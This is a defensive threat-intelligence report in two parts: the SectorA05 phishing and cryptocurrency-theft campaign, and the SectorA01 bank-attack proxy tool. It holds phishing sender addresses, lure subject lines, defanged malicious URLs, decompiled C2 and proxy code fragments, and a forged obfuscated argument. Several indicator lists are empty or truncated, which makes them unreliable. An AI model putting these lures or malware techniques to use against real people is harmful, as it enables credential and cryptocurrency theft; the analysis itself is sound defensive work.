  • hxxps://drive[.]google[.]com/uc?export=download&id=1MVR58_5SlXgDZ5arasQk9AnmihAb3KJ6
  • hxxps://drive[.]google[.]com/uc?export=download&id=1ocUSxHf_0jUjVMMbAQzwTJb0blUG0bYh
  • hxxps://drive[.]google[.]com/uc?export=download&id=1olByidca-8vkS-5jRKL9CirKPEP7waHm
  • hxxps://drive[.]google[.]com/uc?export=download&id=1RC5_9WWrfMMZKfu11OfIac5y2d5vRH1c
  • hxxps://drive[.]google[.]com/uc?export=download&id=1xCePTgAdwNIAN7MWOH_80aN_TZgn8uFv

Gmail Phishing attacks

SectorA05 conducted phishing attacks for each target user’s email service. They used phishing attacks on users who were using Korea’s leading e-mail services and Google’s Gmail service. Through these phishing attacks, they wanted to get the password of the target user account. Here’s a look at some examples of Gmail phishing attacks.

The following screenshot shows phishing emails disguised as being sent from Gmail’s security team. It is actually sent to a specific target user by a hacker in SectorA05. It requests the target user to protect their email account because there was some unusual activity which does not seem to have been performed by the target user – if the link is clicked, the target user is directed to the phishing login site where the target user’s password will be transferred to the attacker’s server if they enter their password and “protect” their account.

[Examples of Gmail phishing mail]

SectorA05 has been using phishing attacks for many years. The phishing email information they used are as follows.

A. Phishing Mail Sender Email Address

They created email addresses that confused victims by using security-related keywords such as protect, privacy, and security.

  • acc[.]signnin[.]send@gmail[.]com
  • countine[.]protector[.]mail@gmail[.]com
  • n0[.]reaply[.]moster@gmail[.]com
  • no[.]raply[.]letservice@gmail[.]com
  • no[.]repiy[.]acc[.]notice@gmail[.]com
  • noreaply[.]securiity@gmail[.]com
  • noreply[.]centre[.]team@gmail[.]com
  • privacy[.]protect[.]team@gmail[.]com
  • protect[.]password[.]teams@gmail[.]com
  • protect[.]privacy[.]accounnt@gmail[.]com
  • protector[.]privacy[.]master@gmail[.]com

B. Phishing Mail Subject

Phishing email subject lines used were primarily focused on email security – sending emails in the subject related to topics such as email hijackings, login attempts, security status, recovery emails, and password resetting, to convince victims to verify account information.

  • “[경고] 구글은 귀하의 비밀번호를 이용해 계정에 접근하려는 수상한 로그인 시도를 차단했습니다.”
  • “[경고] 누군가가 내 계정에 접근하려는 로그인 시도를 차단했습니다. 즉시 보호상태를 확인하세요.”
  • “[경고] 누군가가 내 비밀번호를 이용해 계정에 접근하려는 시도가 있었습니다”
  • “[중요] 누군가가 내 계정에 접근하려는 시도를 차단했습니다.”
  • “[중요] 즉시 보안상태를 확인하세요.”
  • “누군가가 내 이메일 주소를 복구 이메일로 추가했습니다”
  • “비밀번호 재설정 요청이 접수되었습니다.”
  • “연결된 Google 계정 관련 보안 경고”

The next part is translated into English.

  • “[WARNING] Google has blocked suspicious sign-in attempts to access your account using your password.”
  • “[WARNING] Someone has blocked sign-in attempts to access your account. Please check the protection immediately.”
  • “[WARNING] Someone tried to access your account using my password”
  • “[IMPORTANT] Someone has blocked an attempt to access your account.”
  • “[IMPORTANT] Check your security status immediately.”
  • “Someone added my email address as a recovery email”
  • “Your password reset request has been received.”
  • “Security warnings associated with linked Google Accounts”

C. Phishing Server Domain Address

The sub-domain name of the phishing page was also made to try to confuse the target user by using names similar to the target user’s email provider, such as using “qooqle” instead of “google”.

  • hxxp://acount-qooqle[.]pe[.]hu
  • hxxp://myacccounts-goggle[.]hol[.]es
  • hxxp://myaccounnts-goggle[.] esy[.]es
  • hxxp://qqoqle-centering[.]

Domains used as phishing servers were used not only for phishing but also for servers that distributed malware and servers that collected information from the victims.


In January 2019, the malware distributed to the reporters downloaded files which obtained C2 information from Google Drive. The hacker’s Google Drive account is “countine[.]protector[.]mail@gmail[.]com”. This email account was also used for Gmail phishing attacks in September 2017 which asked for a password reset. This is an example of one of the Gmail accounts they create and use for both phishing and hosting Google Drive malware content.

Building a nest in “Agora”

“Agora” was an open meeting place in ancient Greek cities. In one of South Korea’s famous portal sites, the name “Agora” was used as an online space for articles and public discussion. A similar site called “Agora 2.0” was created to mimic this but had been neglected for a long time. The site has a domain called “ago2[.]co[.]kr” and has a Japanese IP address.

[Description of the site ‘Agora 2.0’]

SectorA05 hacked the “ago2[.]co[.]kr” server and used it as a C2 server. In January 2019, malware distributed to the reporters used “ago2[.]co[.]kr” as one of the C2 servers. As we continued investigating, we found that the server has been used as a malicious C2 server for at least 27 months. For example, the malware hash “2a25d42130837560fcff1e1e19264f05784bf9e9db6464afb15d7e26f7f4a433” used “ago2[.]co[.]kr” as a C2 server in “Operation Kitty Phishing” in November 4th, 2016.

Thus, they have built an illegitimate nest at “ago2[.]co[.]kr” and have used it as C2 for more than 27 months since at least 2016. In 2017 and 2018, malware from SectorA05 was still using that domain as a C2 server.

The Constant XOR Table

SectorA05 uploads encrypted malware to their C2 server, and the existing malware decrypts it with a XOR Table and then executes it. As we tracked usage of this XOR Table, we confirmed that malware using the same XOR table was used for the attack in June 2017. There are two kinds of XOR tables used as follows.

[January 7, 2019 XOR Decode function used in malware against reporters]

“Case A” refers to the group of malware samples used to attack the reporters, and this XOR Table was already in use in 2017.

Case HASH (SHA256) Timestamp (UTC+9) XOR Table
  f070768ba2d0091b66e2a15726e77165f64ec976e9930425009da79c7aa081ac 2017-06-02 10:09:19 051BC852ED4D1E4BD44030D6BF3187D056C1BE63947D08B00FE0F2E84BC8AB82
A 7603be6e20fdf1338f5de8660b866a7dcb87f1468d139930d9afcba7f3acabb4 2018-12-26 01:40:20
  8573d9008cca956a8f8b9a46ed7880b471435327e8e0ea42b2e143b410a99d7b 2017-07-15 11:23:06B20A82932F459278D44058ADBF3113FB56C1D749947D0FE00FE0ABC84BC8A02B
A fce7a02f4ca7bdab7fdb8168a2478e5897f6f31e3b53d36378033f6ba72ddc29 2018-12-10 06:55:36
A 48ba9d01f1fba5421e8bfbdd384a3849916bbd3e7930557f7d8f92f27cceb5fe2018-12-10 06:55:27
A 12ee511259f7f03e8472efa8baf3e250b64f8da65fe71212cedfdac887f503f42019-01-07 16:28:29
A 55e69e1337af0d93b5a3742d999bf805177c404e7e60e48f303509592ecd0e292019-01-07 16:41:09

Here, Kitty, Kitty!

After initial infection, SectorA05 performs reconnaissance first, such as taking the entire file list of the target user. If the target user has important information related to the Korean government or information related to cryptocurrency, they send additional malware and continuously monitor and collect information.

Additional malware we collected includes screen capture, keylogger, and Chrome Browser Password Stealer.

A. Screen Capture Module

This module periodically captures the victim screen, compresses it, and then sends it to a specific folder on the C2 server. An example of the file name to be transmitted is “[MAC Address]_imgscr_20190124_235450161”.

(SHA256 : 98e1cc1b96b420ece848a2b43a0c1ae0b5f9356a11227fca181ada95435d2c63)

[Code to capture screen]

B. Keylogger Module

This module periodically sends user’s keystrokes together with the window name of the program keystrokes were entered into to the hacker.

(SHA256 : 71841a1b5ee1b383a9282bf513723b7f1713a0e1ee501db38d64c2db9ba08ec4)

[Code to store the victim’s keyboard input value]
[Keylogging information sent to the C2 server]

C. Chrome Browser Password Stealer Module

This module steals information from the Chrome Browser and sees the value of the cookie and login data file in the “\AppData\Local\Google\Chrome\User Data\Default\”.

(SHA256 : 08ac5048e86d368eea55d55781659dc54070debc9d117ed0a5ca8edd499fe1f8)

[Code to steal cookies from Chrome Browser]

In some cases, by identifying the user name of the victim PC during the initial infection, the additional malware sent is compiled on a per victim basis. For example, the malware might make use of a fixed username and only steal information related to that specific user.

[Code to steal the login data of CEO user’s Chrome Browser]

Stealing Coins – a personal purpose or a nation state goal?

As we watched SectorA05’s theft activity, we realized that they divided their targets into two classes. The purpose of targeting the first target class was to steal information from South Korean government officials and the purpose of targeting the second target class was to steal cryptocurrency. SectorA05 is an organization that traditionally seeks to seize confidential information from South Korea and neighboring countries. In recent years, however, we found that they are spending a lot of time trying to steal cryptocurrency as well.

We wonder whether SectorA05 is expanding its official role from spying to also including stealing cryptocurrencies, or whether some of SectorA05 staff are deviating from their official interests.

In any case, they continued to actively steal cryptocurrency-related coins from both classes. Their goals are employees of cryptocurrency exchanges, normal users of cryptocurrency, and cryptocurrency-related developers.

They searched the victim’s directory for the cryptocurrency wallet and private key as follows:

[Navigate the file path where the cryptocurrency wallet and private key are stored]

Then, in order to take the control of the cryptocurrency wallet and corresponding private keys stored in the file path, additional malware (“59203b2253e5a53a146c583ac1ab8dcf78f8b9410dee30d8275f1d228975940e”) which compresses the files in the file path is distributed to the target users.

We see that they are responsible for monitoring and managing additional post-infection actions such as manually compiling and distributing additional malware to collect files.

[Malware that compresses files in a path with a wallet and a private key]

They also stole the Ethereum Keystore file issued by MyEtherWallet.

Thus, they are not only interested in confidential information of the government but also in stealing cryptocurrencies.

Kitty? Why? Who?

During the course of constantly tracking SectorA05, we found a management script that they use to manage victims. In the script file itself, they referred to their victims as “Kitty”. We decided to call their operation name “Operation Kitty Phishing”.

[Administrative scripts that an attacker manages victims]

They never stop working

We were surprised at their endless hacking activities as we track them down. They spread phishing e-mails to target users without rest, and their malware continued to spread. Even after distributing malware to reporters covering the Unification Ministry in early January 2019, they then distributed malware to potential users of cryptocurrency.

In addition, if the infected victim’s PCs were scanned and files related to cryptocurrency were found, malware would be compiled and distributed to individual users. The malware hash “f483d5051f39d1b08613479ccbc81423a15bfe5c5fb5a7792d4307a8af4e4586” is an example of a malware compiled and created solely for a single user. As the user name of the victim PC is exposed, the malware for stealing cryptocurrency is tailored for the individual user and distributed in real time.

[Steal a specific file from the victim’s PC username folder]

After they sent malware to the reporters, they continued to use the following URLs containing malware.

  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/AlyacMonitor64
  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/cookie.a
  • hxxp://safe-naver-mail[.]pe[.]hu/Est/down/2.a
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]
  • hxxp://aiyac-updaite[.]


We have been constantly tracking “Operation Kitty Phishing” activity of SectorA05, which is targeting key government officials, cryptocurrency exchanges, and users in South Korea. We were amazed that their activities are older and last longer than we thought.

It was very difficult initially to judge whether the organization conducting email account phishing and the organization distributing malware were part of the same organization, but after tracking them over a long period, we can say with high confidence that they are both part of SectorA05 and are running both operations simultaneously.

While we write this article, they are continuing their malicious activities. We will still keep track of them. Therefore, if new activity is confirmed, our ThreatRecon Team will continue reporting on our findings.

Indicators of Compromise (IoCs)

Hashes (SHA-256)

028abdf89dc34088c2935e972a97f2d1249efe100f6282979d1771121c45101c 03cd82887b032ce2968bb739d13e1dd0ce3683df5bc1b87edc6872ddcd1dc625







MITRE ATT&CK Techniques

The following is a MITRE ATT&CK matrix that applied the “Operation Kitty Phishing” of the SectorA05 group.

Initial Access

Spearphishing Attachment
Spearphishing Link
Valid Accounts


Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
Graphical User Interface
Third-party Software
User Execution


Registry Run Keys / Startup Folder
Valid Accounts

Privilege Escalation

Process Injection
Valid Accounts

Defense Evasion

Deobfuscate/Decode Files or Information
File Deletion
Obfuscated Files or Information
Process Injection
Valid Accounts
Web Service

Credential Access

Credential Dumping
Credentials in Files
Input Capture
Private Keys


Application Window Discovery
File and Directory Discovery
Process Discovery
Query Registry
System Information Discovery
System Owner/User Discovery

Lateral Movement



Automated Collection
Data from Local System
Data from Network Shared Drive
Data from Removable Media
Email Collection
Input Capture
Screen Capture


Automated Exfiltration
Data Compressed
Exfiltration Over Command and Control Channel
Scheduled Transfer

Command And Control

Commonly Used Port
Data Encoding
Multi-Stage Channels
Remote Access Tools
Standard Application Layer Protocol
Web Service

SectorA01 Custom Proxy Utility Tool Analysis


SectorA01 is one of the most infamous state sponsored threat actor groups globally and is unique in the sense that it is one of the only state sponsored groups with large interests in financial crime. So with the continued interest into SectorA01’s financial crime activities due to the recent potential misattribution of the Ryuk ransomware [1], we decided to perform an analysis into one of the tools – a proxy utility executable – used exclusively by SectorA01 that recently caught our attention again.

Interestingly, in the Hidden Cobra FASTCash report by the US-CERT [2] in October last year, there were two versions of a “Themida packed proxy service module” (i.e. x32 and x64 versions). Our analysis of those modules showed code reuse of critical functions with the sample we are analyzing in this post, leading us to think that those samples might be an evolution of this sample.

SectorA01 Proxy Utility

SectorA01 uses a variety of tools for different purposes, but one common custom tool used in the attacks targeting the Polish banks in 2016-2017 [3], a Taiwanese Bank in 2017 [4], and Vietnamese banks in 2018 [5] is one of their custom proxy utility executables.

The latest unique sample of this proxy utility we could find was on December 10th, 2018 from Canada. This leads us to one of a few possible theories that Canadian bank(s) may have been one of the many unreported or reported [6] targets during the time period of the attack on the Taiwanese bank based on the compilation timestamps.

As we can see from the FASTCash proxy samples below, at least one of their developers compiles the 64-bit sample immediately after compiling the 32-bit sample – behavior very normal for developers when compiling for multiple systems. The same thing can be seen for the two samples on 20 Feb 2017, and so in fact instead of calling them samples targeting a Taiwanese bank and potentially a Canadian bank, it may be more accurate to call it just one of the many pairs of 32-bit and 64-bit proxy samples produced by the group.

A proxy was also used against an unnamed Southeast Asian bank [7] which appears to be an older version of the proxy, and against an Indian bank [8] which appears to be a newer version of the proxy based our code analysis from samples in the US-CERT FASTCash report.

But despite the similarities, however, we are unable to definitively state that these samples were earlier (unnamed Southeast Asian bank) or later (FASTCash attack, such as against the Indian bank) versions of the proxy. After all, SectorA01 has more than one proxy tool in its arsenal, such as the proxy used together with their TYPEFRAME trojan [9] which has a separate code base.

DescriptionCompilation Timestamp
Attack on unnamed SEA bank (old version)17 Sep 2014 16:59:33
Attack on several Polish banks (variant)24 Aug 2015 10:21:52
Attack on Vietnamese banks (variant)2 May 2016 03:24:39
Attack on a Taiwanese Bank (32-bit) (variant)20 Feb 2017 11:09:30
Sample Discovered from Canada (64-bit) (sample analyzed)20 Feb 2017 11:09:41
FASTCash (32-bit) (new version)14 Aug 2017 17:14:04
FASTCash (64-bit) (new version)14 Aug 2017 17:14:12

Sample Background

This executable is a custom tunneling proxy utility tool in SectorA01’s toolkit. It can be used as either a tunneling proxy server to forward traffic to another destination, or as a tunneling proxy client which requests another infected tunneling proxy server to perform requests.

Besides being used as one of several ordinary proxy servers in a chain of servers to hide the source of attacks, against one example banking target from India in the FASTCash attacks, “a proxy server was created and transactions authorized by the fake or proxy server”. In this scenario, the proxy utility seems to be not used just as a secondary helper utility, but as the primary attack malware.

SectorA01 normally packs these samples with either the Themida or Enigma Protector, but in this blog post we will only be showing the analysis of the unpacked sample.

Process Arguments

This utility requires a single process argument in order for it to run. It attempts to decode the argument and only continues its execution path if the decoded argument match the format it is expecting.

The argument is delimited by the “|” symbol, and the utility decodes up to four tokens with each token being decoded individually. The first is required and used as the primary C2 server (malware acting as tunneling proxy server) or as the URL to be requested (malware acting as tunneling proxy client), the optional second token is used as the proxy target information, the optional third token is used as proxy server information, and the optional fourth token is an optional proxy username and password.

Each deobfuscated token is separated by a colon “:”, which is used as the deobfuscated process arguments delimiter.

int __stdcall WinMain_0(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){ //deobfuscate process arguments here deobfuscation_complete: if ( strlen(deobfuscated_c2_1) != 0 && strchr(deobfuscated_c2_1, “:”) ){ … } return 0; }

The decoding algorithm makes use of a rotating character in an eight character string “cEzQfoPw” and the loop index to ensure that every deobfuscated character at a different index comes from a different two obfuscated characters.

We recreated this deobfuscation algorithm and created an obfuscation algorithm, which allowed us to forge our own process arguments. An example of a process argument which uses all four tokens could be “!y$t$A$s!z$S$e$U$Q$Y$1$W$U!}$d|!y#z$A$s!z$S$o$1$5$t$A$e$U!x|!y#{!}$Z$C$R$o$1$P#}$8$a!y!y|!00X!B0]0D!8#z$2$R0d$0$b!w!20c!70B0d”.

Example TokenDecoded C2 InformationUsage
!y$t$A$s!z$S$e$U$Q$Y$1$W$U!}$d Server (1-2 arguments)
Proxy Target (3-4 arguments)
!y#z$A$s!z$S$o$1$5$t$A$e$U!x172.16.1.1:443Proxy Target (2 arguments only)
!y#{!}$Z$C$R$o$1$P#}$8$a!y!y10.1.1.12:8080Proxy Server (3-4 arguments)
!00X!B0]0D!8#z$2$R0d$0$b!w!20c!70B0dsector%20a01:proxyProxy Authentication (4 arguments only)

Note that since the algorithm transforms every two encoded characters into one decoded character based on its character index, there are many possible two characters which will result in the same character, and finally countless different strings which would decode to a single string.

C2 Communication

The algorithm used for C2 communications is more straightforward – a combination of ADD/XOR repeatedly from each character in a hard coded 20 character byte array “{47 B0 62 0E 69 F3 22 8D 65 40 BF 39 24 A6 C3 BB 8E 68 EB B5}” is used for decoding, and the opposite XOR/SUB repeatedly from the reversed byte array is used for encoding. The algorithm restarts for each character without context, so it essentially ends up being a character substitution table.

There are eight commands to communicate with the C2 server, encoded by either the C2 server or the proxy client then decoded by the other side. These commands are in the Russian language but as other researchers have pointed out in the past, is simply a false flag.

In fact, in one of the analyzed malware used against an unnamed Southeast Asian bank, we see that what appears to be a much earlier versions of the proxy having seven numeric-only control codes while this sample has eight Russian language control codes, with the control codes in both samples having almost the same meaning.

OperationDescriptionHex Values over the Network
kliyent2podklyuchitMalware thread created notification (client)d1 14 23 b3 c7 b2 ac fe 70 0d 1c d1 14 b3 d7 f9 38 23 ac
NachaloClient has started (client)92 ab f9 38 ab 14 0d
ssylkaTunneling proxy server has started (client)c9 c9 b3 14 d1 ab
poluchitGet proxy target information (server)70 0d 14 d7 f9 38 23 ac
ustanavlivatSet proxy target information (server)d7 c9 ac ab b2 ab 2a 14 23 2a ab ac
pereslatStart a new tunneling proxy server session in new thread (server)70 c7 be c7 c9 14 ab ac
derzhatMaintain connection (server)1c c7 be b6 38 ab ac
vykhoditExit (server) / Client has exited (client)2a b3 d1 38 0d 1c 23 ac

Tunneling Proxy Server

When this utility acts as a tunneling proxy server, it directly uses Windows Sockets 2 (“WS2_32”) to achieve their rudimentary proxy.

signed __int64 __fastcall c2_ssylka(LPVOID lpThreadParameter){ SOCKET c2Socket = begin_c2(“ssylka”); … SOCKET targetProxySocket = retrieveProxySocket(); … start_tunnel_proxy_server(c2Socket, targetProxySocket); … } signed int __fastcall start_tunnel_proxy_server(SOCKET c2Socket, SOCKET targetProxySocket){ … numBytesReceived = recv(c2Socket, &dataToProxy, 0x2000, 0); … numBytesReceived = send(targetProxySocket, &dataToProxy, numBytesReceived, 0); … }

Tunneling Proxy Client

When this utility acts as a tunneling proxy client, it utilizes the more powerful embedded libcurl library (version 7.49.1 for this sample, but not always the case) to command other infected tunneling proxy servers.

__int64 __fastcall connect_to_proxy(__int64 fixedFunctionAddress, __int64 proxyTarget){ … curl_setopt(handle, CURLOPT_URL, proxyTarget); … curl_setopt(handle, CURLOPT_PROXY, fixedFunctionAddress + 16); //refers to deobfuscated proxy server information … curl_setopt(handle, CURLOPT_HTTPPROXYTUNNEL, 1); … if ( strlen((fixedFunctionAddress + 278)) != ) //if deobfuscated argument 4 is not empty curl_setopt(handle, CURLOPT_PROXYUSERPWD); //curl_setopt argument 3 = deobfuscated process argument 4, which is not detected by decompiler … } … }

The CURLOPT_HTTPPROXYTUNNEL code causes the client to starts by using HTTP CONNECT to the proxy server in order to request it to forward traffic to the proxy target.

>Internet Protocol Version 4, Src: x.x.x.x, Dst: >Transmission Control Protocol, Src Port: xxxxx, Dst Port: 8080, Seq: 1, Ack: 1, Len: 59 >Hypertext Transfer Protocol >CONNECT HTTP/1.1\r\n >[Expert Info (Chat/Sequence): CONNECT HTTP/1.1\r\n] Request Method: CONNECT Request URI: Request Version: HTTP/1.1 Host:\r\n

The FASTCash Connection

In October last year, the US-CERT reported about the “FASTCash” campaign by SectorA01, which was essentially an ATM cash-out scheme whereby SectorA01 remotely compromised bank payment switch applications to simultaneously physically withdraw from ATMs in many countries and steal millions of dollars.

Some of the artifacts used in the campaign included proxy modules, a RAT, and an installer application. When we performed a preliminary analysis and compared the FASTCash proxy module to the proxy module analyzed in this post, we found algorithmic similarities between the decoding/encoding functions, the process argument deobfuscation function, and the proxy function.

However, the FASTCash proxy module also had more functions in them with new capabilities as described briefly in the US-CERT FASTCash Malware Analysis Report [10]. Additionally, our own analysis showed that they have also updated the use of amateur-ish strings which were previously easily detectable from memory and obviously malicious, to now hiding or removing those custom strings. This is their normal behavior as it has been known that they are constantly modifying their own source code, and these similarities and developments leads us to think that the FASTCash proxy module might be an evolution of their previous proxy module.


Attribution is a complex and controversial topic, but regardless, correctly attributing a threat to a particular threat group is a far easier task than correctly attributing the threat to or being linked to a particular nation state. Given even a single piece of complex enough custom malware believed to be in possession by only a single group and context behind the attack, it is possible to have some degree of confidence of which group was behind the attack.

But even custom malware source code can get stolen, the executable itself repackaged, or the functions recreated. In a simpler scenario, false flags such as strings and metadata could also be placed.

Regarding the initial attribution of the Ryuk ransomware, however, while others have focused on the misattribution, our view is that even if it was correct it would simply have been a lucky guess. Basing attribution solely on the usage of a single privately purchasable malware is fundamentally flawed, and the simple truth is that no organization in the world would be able to track every piece of malware to know what is being sold in the dark and deep web anyway.

That is why in order to have a higher degree of confidence of who is behind an attack, the entirety of the threat’s tactics, techniques, and procedures (TTPs) need to be analyzed across multiple events using both trusted public and vetted private sources.

SectorA01 shows no signs of stopping their attacks against financial sectors worldwide and although they have been constantly modifying their code protectors, functions, and algorithms, there will be traces of similarities across different versions of their tools. Our Threat Recon Team will continue tracking such events and malware and report on our findings.

Unpacked Sample (SHA-256)


Memory Dump Samples from US-CERT FASTCash Report (SHA-256)



Packed Sample from Polish banks attack (SHA-256)


Sample from Taiwanese bank attack (SHA-256)


Sample from Vietnamese banks attack (SHA-256)


Attack on Unnamed SEA Bank (“TCP Tunnel Tool”) (SHA-256)



[1] Ryuk Ransomware Attack: Rush to Attribution Misses the Point
[2] HIDDEN COBRA – FASTCash Campaign
[3] Włamania do kilku banków skutkiem poważnego ataku na polski sektor finansowy
[5] High alert against malicious code attacks in Vietnam
[6] BMO and CIBC-owned Simplii Financial reveal hacks of customer data
[8] North Korean connection to Cosmos hacking? Signs point to Bangladesh heist masterminds
[9] MAR-10135536-12 – North Korean Trojan: TYPEFRAME
[10] MAR-10201537 – HIDDEN COBRA FASTCash-Related Malware